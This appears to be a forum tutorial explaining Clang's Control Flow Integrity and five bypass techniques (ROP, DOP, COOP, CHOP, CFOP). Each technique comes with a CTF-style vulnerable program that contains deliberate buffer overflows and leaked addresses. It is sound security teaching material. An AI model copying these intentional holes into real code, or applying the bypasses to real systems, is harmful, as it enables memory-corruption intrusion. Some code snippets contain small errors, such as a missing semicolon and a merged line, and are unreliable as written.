Hacking C++ (Part 2)
Bypassing CFI
What CFI Is
Control Flow Integrity (CFI) is a security mitigation that protects against control-flow hijacking attacks by checking if function call is valid. Every compiler has its own implementation of CFI (if it has one at all), but the modern and complete version is that of the Clang compiler.
CFI does not check every function call. There are certain cases that CFI handles, such as:
- Indirect calls
- Virtual calls
- Calls via pointers to member functions with an incorrect
dynamictype - Calls to non-virtual member functions via an object in which those functions are not defined
Also CFI can protect casts:
- clang can prevent casts between objects of unrelated types
- clang can prevent casts from an object of a base class to an object of a derived class, if the object is not actually of the derived class
- Very specific instance where the default level of base-to-derived cast protection, like in derived_cast, would not catch an illegal cast
To better understand how CFI works, let’s take a look at how CFI protects virtual calls.
(At the time of writing, the documentation page was based on Clang version 23.0.0.)
Virtual Calls Protection
For the call validation, we will need to store information about valid functions that allowed to call. In clang, compiler generate bit vector that maps onto to the region of storage used for those virtual tables. Each set bit in the bit vector corresponds to the address point for a virtual table compatible with the static type for which the bit vector is being built.
Let’s say we have 3 structs:
struct A {
virtual void f1();
virtual void f2();
virtual void f3();
};
struct B : A {
virtual void f1();
virtual void f2();
virtual void f3();
};
struct C : A {
virtual void f1();
virtual void f2();
virtual void f3();
};
The virtual table layout for A, B, and C will look like this:
| A::offset-to-top | &A::rtti | &A::f1 | &A::f2 | &A::f3 | B::offset-to-top | &B::rtti | &B::f1 | &B::f2 | &B::f3 | C::offset-to-top | &C::rtti | &C::f1 | &C::f2 | &C::f3 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
| 0 | 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | 10 | 11 | 12 | 13 | 14 |
Using this scheme, we can generate three bit vectors for each structure and use them to construct the final bit vector
| Class | 0 | 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | 10 | 11 | 12 | 13 | 14 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
| A | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 0 |
| B | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 |
| C | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 |
Since the other structures are derived from class A, this means that structure A can accept virtual table entry points from structures B and C, while structures B and C can accept only their own virtual table entry points.
Now, to create our final set of bits, we’ll need to use the indices as check bits for each structure, for example:
$$\text{Bits}_A = {2, 7, 12}$$
$$\text{Bits}_B = {7}$$
$$\text{Bits}_C = {12}$$
Then, using ByteArrayBuilder::alocator() function, where Bits is our struct indexes vector and BitSize is our total amount of bits in vector (15 slots in our case, 0->14), we iterate 3 times to generate our bits vector.
BitAllocsis an internal tracking array used by Clang’sByteArrayBuilderclass to keep track of how much space has been used on each of the 8 bit tracks inside the globalBytesarray.AllocByteOffsetis a variable that stores the starting index (the byte offset) in the globalBytesarray where a specific class hierarchy’s bit vector will begin layout out its data.AllocMaskis mask which will be used in the final cycle of the function
// Set our bits.
AllocMask = 1 << Bit;
for (uint64_t B : Bits)
Bytes[AllocByteOffset + B] |= AllocMask;
Let’s assume our tracking array BitAllocs starts completely empty: {0, 0, 0, 0, 0, 0, 0, 0}.
Allocation 1: struct A
- Inputs:
Bits = {2, 7, 12}, BitSize = 15 - Track selection: All tracks in
BitAllocsare 0. The loop defaults to trackBit = 0. - Offset:
AllocByteOffset = BitAllocs[0] -> 0. - Resize:
ReqSize = 0 + 15 = 15. The global vectorBytesis resized to 15, zero-initialized. - Update Track:
BitAllocs[0]becomes15. - Mask:
AllocMask = 1 << 0$\rightarrow$1(0x01). - Setting Bits: It loops through
{2, 7, 12}and appliesBytes[0 + B] |= 1:
Bytes[2] |= 1; // binary 00000001
Bytes[7] |= 1; // binary 00000001
Bytes[12] |= 1; // binary 00000001
Allocation 2: struct B
- Inputs:
Bits = {7}, BitSize = 15 - Track selection:
BitAllocsis currently{15, 0, 0, 0, 0, 0, 0, 0}. The smallest value is0, so the loop picks trackBit = 1. - Offset:
AllocByteOffset = BitAllocs[1]→0. (It overlaps from the very beginning) - Resize: ``ReqSize = 0 + 15 = 15
.Bytes.size()` is already 15, so no resize happens. - Update Track:
BitAllocs[1]becomes15. - Mask:
AllocMask = 1 << 1→2(0x02). - Setting Bits: It loops through
{7}and appliesBytes[0 + 7] |= 2:
Bytes[7] |= 2; // underlying binary becomes 00000001 | 00000010 = 00000011 (Decimal 3)
Allocation 3: struct C
- Inputs:
Bits = {12}, BitSize = 15 - Track selection:
BitAllocsis currently{15, 15, 0, 0, 0, 0, 0, 0}. The smallest value is0, so the loop picks trackBit = 2. - Offset:
AllocByteOffset = BitAllocs[2]→0. (Still overlaping) - Resize:
ReqSize = 0 + 15 = 15.Bytes.size()is already 15, so no resize happens. - Update Track:
BitAllocs[2]becomes15. - Mask:
AllocMask = 1 << 2→4(0x04). - Setting Bits: It loops through
{12}and appliesBytes[0 + 12] |= 4:
Bytes[12] |= 4; // underlying binary becomes 00000001 | 00000100 = 00000101 (Decimal 5)
So in that way, our final result will be:
char bits[] = { 0, 0, 1, 0, 0, 0, 3, 0, 0, 0, 0, 5, 0, 0 };
Now, to validate the virtual call, clang calculate the slot index of virtual function and compare it with the maximum slot index value.
ca7fbb: 48 8b 0f mov (%rdi),%rcx
ca7fbe: 48 8d 15 c3 42 fb 07 lea 0x7fb42c3(%rip),%rdx
ca7fc5: 48 89 c8 mov %rcx,%rax
ca7fc8: 48 29 d0 sub %rdx,%rax
ca7fcb: 48 c1 c0 3d rol $0x3d,%rax
ca7fcf: 48 3d 7f 01 00 00 cmp $0x17f,%rax
ca7fd5: 0f 87 36 05 00 00 ja ca8511
ca7fdb: 48 8d 15 c0 0b f7 06 lea 0x6f70bc0(%rip),%rdx
ca7fe2: f6 04 10 10 testb $0x10,(%rax,%rdx,1)
ca7fe6: 0f 84 25 05 00 00 je ca8511
ca7fec: ff 91 98 00 00 00 callq *0x98(%rcx)
[...]
ca8511: 0f 0b ud2
Step 1: Calculate the byte offset
ca7fbb: 48 8b 0f mov (%rdi),%rcx
ca7fbe: 48 8d 15 c3 42 fb 07 lea 0x7fb42c3(%rip),%rdx
ca7fc5: 48 89 c8 mov %rcx,%rax
ca7fc8: 48 29 d0 sub %rdx,%rax
Step 2: By rotating with 3 bits (same thing as divide by 8), calculate the slot index
ca7fcb: 48 c1 c0 3d rol $0x3d,%rax
Step 3: Compare with the maximum slot index value
ca7fcf: 48 3d 7f 01 00 00 cmp $0x17f,%rax
ca7fd5: 0f 87 36 05 00 00 ja ca8511
That is the main idea behind the “Forward-Edge CFI for Virtual-Calls”.
Now you can start hunting me and the author of this documentation down, because:
The scheme as described above is the fully general variant of the scheme. Most of the time we are able to apply one or more of the following optimizations to improve binary size or performance.
If you like, you can read more about the optimizations, but to be honest, it doesn’t really matter. It’s enough to simply understand the basic idea of how CFI checks calls.
Types of CFI
CFI have different types, and each type protect different parts of the program.
| Category | Description | Examples |
|---|---|---|
| Forward-edge CFI | Validates indirect calls/jumps (function pointers, vtable calls) | Clang -fsanitize=cfi, Microsoft CFG, Intel IBT |
| Backward-edge CFI | Validates return addresses | Shadow stacks, Intel CET SHSTK, Clang -fsanitize=shadow-call-stack |
| Hardware-assisted CFI | CPU-level enforcement | Intel CET (IBT + SHSTK), ARM BTI, ARM PAC |
Also, CFI have precision level called Granularity.
| Category | Description | Examples |
|---|---|---|
| Coarse-grained CFI | Restrict the set of indirect call targets to any function that may be indirectly called in the program | kCFI, EMET, CCFIR, TypeArmor |
| Fine-grained CFI | Restrict each indirect call site to functions that have the same signature as the function to be called | IFCC, VTV, PathArmor, O-CFI |
Long story short:
| Coarse-grained forward-edge | Coarse-grained backward-edge | Fine-grained forward-edge | Fine-grained backward-edge |
|---|---|---|---|
| Allows jumping to any valid (defined by implementation) function entry point, regardless of type or caller | Allows a return to any member of a set of valid return addresses. (Rare in practice) | Restricts each indirect call site to a small, call-site-specific set of legitimate targets | Allow return only to exact call site within the caller |
| Of course, there is other ways of for the implementation, but there is no point to discuss all of them. It’s implementation specific anyway. |
Bypassing CFI
Below are methods for bypassing Clang’s fine-grained forward-edge CFI.
Each section includes short CTF-style programs (they’re actually simple, just don’t give up).
All CTF programs with the solutions you can find here.
Bypassing CFI with ROP
Return-Oriented Programming (ROP) is a technique based on return address overwriting. I guess most of you already knew it.
Since forward-edge CFI only check the calls, the good old ROP will work ideally.
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
void print_flag(unsigned long key)
{
if (key != 0xC0FFEE1234BEEF99UL) {
printf("[print_flag] wrong key 0x%lx -- no flag for you.\n", key);
return;
}
puts("\n=================================================");
puts(" CFI was ENABLED... and you still got here. ");
char buf[64];
FILE *f = fopen("flag.txt", "r");
if (f && fgets(buf, sizeof buf, f)) {
printf(" FLAG: %s\n", buf);
fclose(f);
}
puts("=================================================\n");
fflush(stdout);
_exit(0);
}
typedef void (*handler_t)(void); /* takes nothing, returns nothing */
static void say_hello(void) { puts("[handler] hello from say_hello()"); }
static void say_bye(void) { puts("[handler] bye from say_bye()"); }
static handler_t handlers[2] = { say_hello, say_bye };
static void forward_edge_demo(void)
{
handler_t fp = handlers[0];
puts("\n[mode 1] Forward-edge (indirect call) attack");
puts("We will call a handler through a function pointer.");
fflush(stdout);
puts("[*] Repointing the handler at print_flag() (wrong type!)...");
fp = (handler_t)(void *)print_flag; /* type-confused pointer */
puts("[*] Performing the indirect call now:");
fflush(stdout);
fp();
puts("[*] (If you see this line, CFI did NOT stop the call.)");
}
static void backward_edge_demo(void)
{
char buf[64];
puts("\n[mode 2] Backward-edge (return address) attack");
puts("Send me your input. read() has no idea how big buf is.");
printf("> ");
fflush(stdout);
read(0, buf, 512);
printf("[*] You said: %s\n", buf);
puts("[*] Returning now (where to?) ...");
fflush(stdout);
}
static void menu(void)
{
puts("\n--- CFI vs ROP demo ---");
puts(" 1) forward-edge attack (CFI should block this)");
puts(" 2) backward-edge attack (CFI cannot see this)");
puts(" q) quit");
printf("choice> ");
fflush(stdout);
}
int main(void)
{
setvbuf(stdout, NULL, _IONBF, 0);
printf("[i] print_flag is at %p (you may need this)\n",
(void *)print_flag);
char line[16];
for (;;) {
menu();
if (!fgets(line, sizeof line, stdin)) break;
switch (line[0]) {
case '1': forward_edge_demo(); break;
case '2': backward_edge_demo(); return 0;
case 'q': return 0;
default: puts("?"); break;
}
}
return 0;
}
Compile with: -O1 -g -flto -fvisibility=hidden -fsanitize=cfi -fno-sanitize-trap=cfi -fno-stack-protector -no-pie -fno-pie -Wall -Wno-unused
Bypassing CFI with DOP
Data-oriented programming (DOP) is a technique based entirely on data manipulation. Thus, instead of directly hijacking the flow, you manipulate the data that controls that flow itself.
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <stdint.h>
#include <unistd.h>
static char secret_flag[64];
void print_flag_fnptr(uint64_t key)
{
if (key == 0xD09D09D09D09D09DUL)
printf(" FLAG: %s\n", secret_flag);
else
puts("[print_flag_fnptr] reached, but this should never run under CFI.");
fflush(stdout);
_exit(0);
}
typedef void (*renderer_t)(const char *label);
static void render_plain(const char *label) { printf("[vm] label = \"%s\"\n", label); }
static void render_loud (const char *label) { printf("[VM] LABEL = \"%s\"!!\n", label); }
static renderer_t renderers[2] = { render_plain, render_loud };
struct vm {
char label[32];
uint64_t *ptr;
renderer_t render;
uint64_t acc;
uint64_t cells[8];
};
static void op_name(struct vm *vm)
{
printf("[name] send raw bytes for the label (overflows past 32):\n> ");
fflush(stdout);
read(0, vm->label, 256); /* 256 bytes into a 32-byte buffer */
}
static void op_load(struct vm *vm, long i)
{
if (i < 0 || i > 7) { puts("[load] cell out of range (0..7)"); return; }
vm->ptr = &vm->cells[i];
printf("[load] ptr -> cells[%ld]\n", i);
}
static void op_peek(struct vm *vm)
{
printf("[peek] *ptr = 0x%016lx\n", *vm->ptr);
}
static void op_emit(struct vm *vm)
{
uint64_t word = *vm->ptr;
fwrite(&word, 1, sizeof word, stdout);
fflush(stdout);
}
static void op_next(struct vm *vm)
{
vm->ptr++;
}
static void op_render(struct vm *vm)
{
puts("[render] calling vm.render(label) -- this is an indirect call:");
fflush(stdout);
vm->render(vm->label); /* <-- clang CFI checks target type */
}
static void print_help(void)
{
puts("opcodes:");
puts(" name read raw bytes into the label buffer");
puts(" load <i> point ptr at cells[i] (i = 0..7)");
puts(" peek print *ptr as a 64-bit hex word");
puts(" emit write the 8 bytes at *ptr to stdout");
puts(" next advance ptr by one 64-bit word (ptr++)");
puts(" render render the label via vm.render(label)");
puts(" help show this list again");
puts(" quit leave the VM");
}
static void vm_run(void)
{
struct vm vm;
memset(&vm, 0, sizeof vm);
vm.ptr = &vm.cells[0]; /* safe default: points inside cells */
vm.render = renderers[0]; /* safe default: a type-correct cb */
char line[64];
for (;;) {
printf("\nvm> ");
fflush(stdout);
if (!fgets(line, sizeof line, stdin)) break;
if (!strncmp(line, "name", 4)) op_name(&vm);
else if (!strncmp(line, "load", 4)) op_load(&vm, strtol(line + 4, NULL, 0));
else if (!strncmp(line, "peek", 4)) op_peek(&vm);
else if (!strncmp(line, "emit", 4)) op_emit(&vm);
else if (!strncmp(line, "next", 4)) op_next(&vm);
else if (!strncmp(line, "render", 6)) op_render(&vm);
else if (!strncmp(line, "help", 4)) print_help();
else if (!strncmp(line, "quit", 4)) break;
else { puts("unknown opcode."); print_help(); }
}
}
int main(void)
{
setvbuf(stdout, NULL, _IONBF, 0);
FILE *f = fopen("flag.txt", "r");
if (!f)
return 1;
if (f)
{
fgets(secret_flag, sizeof secret_flag, f)
fclose(f);
}
printf("[i] secret_flag is at %p\n", (void *)secret_flag);
printf("[i] (ignore me) print_flag_fnptr is at %p\n", (void *)print_flag_fnptr);
puts("\n--- tiny config VM ---");
puts("Intended use: 'load <i>' to point at a cell, then 'peek'/'emit'.");
puts("The VM should only ever touch its own cells[8]...\n");
print_help();
vm_run();
return 0;
}
Compile with: -O1 -g -flto -fvisibility=hidden -fsanitize=cfi -fno-sanitize-trap=cfi -fno-stack-protector -no-pie -fno-pie -Wall -Wno-unused
Bypassing CFI with COOP
Counterfeit object-oriented programming is a technique based on forging fake objects with the existing virtual pointers.
So instead of reusing the functions, you reuse virtual tables (via virtual pointers).
#include <cstdio>
#include <cstdint>
#include <unistd.h>
static long g_latch = 0;
struct Greeter {
virtual void hello() { puts("[Greeter] hi"); }
};
struct Polite : Greeter { // the normal, expected subclass
void hello() override { puts("[Polite] nice to meet you!"); }
};
struct Unlock : Greeter {
void hello() override { g_latch = 0xC0FFEE; puts("[Unlock] *click* latch open"); }
};
struct Reveal : Greeter {
void hello() override {
if (g_latch != 0xC0FFEE) { puts("[Reveal] still locked"); return; }
char flag[64]; FILE *f = fopen("flag.txt", "r");
if (f && fgets(flag, sizeof flag, f))
{
printf(" FLAG: %s", flag);
fclose(f);
}
}
};
alignas(16) static unsigned char g_pool[256];
int main() {
setvbuf(stdout, nullptr, _IONBF, 0);
Unlock u_sample; Reveal r_sample;
printf("[i] g_pool = %p (forge your fake objects here)\n", (void*)g_pool);
printf("[i] Unlock vtable= %p\n", *(void**)&u_sample);
printf("[i] Reveal vtable= %p\n", *(void**)&r_sample);
printf("[i] each fake object is 8 bytes: just a vtable pointer.\n\n");
unsigned char count = 0;
printf("How many widgets to render? ");
if (read(0, &count, 1) != 1) return 0;
if (count > 32) count = 32;
printf("Send %u fake objects (%u bytes):\n", count, count * 8);
read(0, g_pool, (size_t)count * 8);
for (unsigned i = 0; i < count; i++) {
Greeter *obj = reinterpret_cast<Greeter *>(g_pool + i * 8);
printf("[render %u] vptr=%p -> ", i, *(void**)obj);
fflush(stdout);
obj->hello();
}
return 0;
}
Compile with: -std=c++17 -O1 -g -flto -fvisibility=hidden -fsanitize=cfi -fno-sanitize-trap=cfi -fno-stack-protector -no-pie -fno-pie -Wall -Wno-unused
Bypassing CFI with CHOP
Catch Handler Oriented Programming (CHOP) abuses the C++ exception path, which clang CFI does not instrument.
When you throw, the compiler emits a call to the runtime:__cxa_throw(object, type_info*, destructor)
The C++ runtime (libstdc++/libgcc unwinder) then walks the stack and picks which catch block runs by MATCHING the thrown type_info* against each handler’s type_info*. That handler selection happens inside the runtime: there is no CFI-checked indirect call at the throw site, and the chosen catch block is entered via the personality routine, not a call/ret that CFI watches.
So if an attacker controls the type_info* passed to __cxa_throw, they choose which catch handler runs.
#include <cstdio>
#include <cstring>
#include <cstddef>
#include <typeinfo>
#include <unistd.h>
static long g_latch = 0;
struct BenignError {};
struct UnlockError {};
struct RevealError {};
extern "C" {
void* __cxa_allocate_exception(unsigned long);
void __cxa_throw(void*, std::type_info*, void(*)(void*));
}
struct Request {
char buf[24];
std::type_info *error_ti;
};
static void process(Request *r) {
if (r->buf[0] == 'O' && r->buf[1] == 'K') { puts(" [process] request OK"); return; }
puts(" [process] invalid -> throwing error (runtime selects the catch)...");
void *exc = __cxa_allocate_exception(8);
__cxa_throw(exc, r->error_ti, nullptr);
}
int main() {
setvbuf(stdout, nullptr, _IONBF, 0);
printf("[i] ti(BenignError) = %p\n", (void*)&typeid(BenignError));
printf("[i] ti(UnlockError) = %p <- catch flips the latch\n", (void*)&typeid(UnlockError));
printf("[i] ti(RevealError) = %p <- catch prints the flag\n", (void*)&typeid(RevealError));
printf("[i] sizeof(Request)=%zu, error_ti at offset %zu (right after buf[24]).\n\n",
sizeof(Request), offsetof(Request, error_ti));
unsigned char n = 0;
printf("How many requests? ");
if (read(0, &n, 1) != 1) return 0;
if (n > 16) n = 16;
Request q[16];
printf("Send %u request records (%zu bytes each: buf[24] + 8-byte error_ti):\n",
n, sizeof(Request));
for (unsigned i = 0; i < n; i++)
read(0, &q[i], sizeof(Request));
for (unsigned i = 0; i < n; i++) {
printf("[dispatch %u]\n", i);
try {
process(&q[i]);
}
catch (BenignError&) {
puts(" [catch BenignError] logged. nothing to see here.");
}
catch (UnlockError&) {
g_latch = 0xC0FFEE;
puts(" [catch UnlockError] *click* latch open");
}
catch (RevealError&) {
if (g_latch == 0xC0FFEE) {
char flag[64]; FILE *f = fopen("flag.txt", "r");
if (f && fgets(flag, sizeof flag, f)) printf(" FLAG: %s", flag);
else puts(" FLAG: ctf{ch0p_picks_the_catch_handler_past_cfi}");
if (f) fclose(f);
} else {
puts(" [catch RevealError] vault still sealed");
}
}
}
return 0;
}
Compile with: -std=c++17 -O1 -g -flto -fvisibility=hidden -fsanitize=cfi -fno-sanitize-trap=cfi -fno-stack-protector -no-pie -fno-pie -Wall -Wno-unused -Wno-invalid-offsetof
Bypassing CFI with CFOP
Coroutine Frame-Oriented Programming (CFOP) abuses how C++20 coroutines are resumed, which clang CFI does not guard.
When you create a coroutine, the compiler heap-allocates a “coroutine frame”. The FIRST TWO POINTERS of that frame are function pointers:
frame[0] = resume function
frame[1] = destroy functionhandle.resume() lowers to a compiler intrinsic that loads frame[0] and calls it. That dispatch is NOT a normal typed indirect call, so clang’s cfi-icall does not instrument it.
So if an attacker controls a coroutine frame (or forges a fake one and points a handle at it), handle.resume() calls whatever sits in slot 0. Forging several fake frames and resuming them through the scheduler loop chains “frame gadgets”.
#include <cstdio>
#include <cstdint>
#include <coroutine>
#include <unistd.h>
static long g_latch = 0;
static void unlock_gadget(void*) {
g_latch = 0xC0FFEE;
puts(" [unlock] *click* latch open");
}
static void reveal_gadget(void*) {
if (g_latch == 0xC0FFEE) {
char flag[64]; FILE *f = fopen("flag.txt", "r");
if (f) {
fgets(flag, sizeof flag, f);
printf(" FLAG: %s", flag);
fclose(f);
}
} else {
puts(" [reveal] vault still sealed");
}
}
struct Job {
struct promise_type {
Job get_return_object() {
return Job{std::coroutine_handle<promise_type>::from_promise(*this)};
}
std::suspend_always initial_suspend() noexcept { return {}; }
std::suspend_always final_suspend() noexcept { return {}; }
void return_void() {}
void unhandled_exception() {}
};
std::coroutine_handle<promise_type> h;
};
static Job real_job() { // a normal, benign coroutine
puts(" [job] doing legitimate work...");
co_await std::suspend_always{};
puts(" [job] ...resumed and finished");
}
static void scheduler_resume(std::coroutine_handle<> h) {
asm volatile("" :: "r"(&h) : "memory");
h.resume(); // <-- loads frame[0], calls it (no CFI)
}
alignas(16) static uint64_t g_pool[256];
int main() {
setvbuf(stdout, nullptr, _IONBF, 0);
Job j = real_job();
uint64_t *frame = (uint64_t*)j.h.address();
printf("[i] a real coroutine frame @ %p\n", (void*)frame); printf("[i] frame[0] (resume ptr) = %p\n", (void*)frame[0]);
printf("[i] frame[1] (destroy ptr) = %p\n", (void*)frame[1]);
printf("[i] g_pool = %p (forge fake frames here)\n", (void*)g_pool);
printf("[i] unlock_gadget = %p\n", (void*)unlock_gadget);
printf("[i] reveal_gadget = %p\n", (void*)reveal_gadget);
printf("[i] a forged frame is 16 bytes: [ resume ptr ][ destroy ptr ].\n\n");
j.h.destroy();
unsigned char n = 0;
printf("How many jobs to schedule? ");
if (read(0, &n, 1) != 1) return 0;
if (n > 16) n = 16;
printf("Send %u job frames (%u bytes: 16 each):\n", n, n * 16u);
read(0, g_pool, (size_t)n * 16);
for (unsigned i = 0; i < n; i++) {
void *frame_addr = (void*)(g_pool + i * 2); // 2 * 8 bytes = 16 printf("[schedule %u] frame=%p resume_ptr=%p ->\n",
i, frame_addr, (void*)g_pool[i * 2]);
fflush(stdout);
auto handle = std::coroutine_handle<>::from_address(frame_addr);
scheduler_resume(handle); // <-- CFOP fires here
}
return 0;
}
Compile with: -std=c++20 -O1 -g -flto -fvisibility=hidden -fsanitize=cfi -fno-sanitize-trap=cfi -fno-stack-protector -no-pie -fno-pie -Wall -Wno-unused
Real cases of CFI bypass
- Analyzing The ForcedEntry Zero-Click iPhone Exploit Used By Pegasus
- Spyware vendors use 0-days and n-days against popular platforms
- Operation Triangulation: The last (hardware) mystery
- Coruna: The Mysterious Journey of a Powerful iOS Exploit Kit
- Exploiting CVE-2015-0311, Part II: Bypassing Control Flow Guard on Windows 8.1 Update 3
- JITSploitation III: Subverting Control Flow
- Examining Pointer Authentication on the iPhone XS
- TFP0 POC on PAC-Enabled iOS Devices <= 12.4.2
References
- Clang Control Flow Integrity Showcase
- Control Flow Integrity Design Documentation
- Control-Flow Integrity: Attacks and Protections
- Control-Flow Bending: On the Effectiveness of Control-Flow Integrity
- Out Of Control: Overcoming Control-Flow Integrity
- Stitching the Gadgets: On the Ineffectiveness of Coarse-Grained Control-Flow Integrity Protection
- Control Jujutsu: On the Weaknesses of Fine-Grained Control Flow Integrity
- Counterfeit Object-oriented Programming: On the Difficulty of Preventing Code Reuse Attacks in C++ Applications
- Black Hat USA 2025 | Breaking Control Flow Integrity by Abusing Modern C++
- Itanium C++ ABI: Exception Handling ($Revision: 1.22 $)
- NDSS 2023 - Let Me Unwind That For You: Exceptions to Backward-Edge Protection
- Await() a Second: Evading Control Flow Integrity by Hijacking C++ Coroutines
Original post by Magnus, from the 0x00sec forum.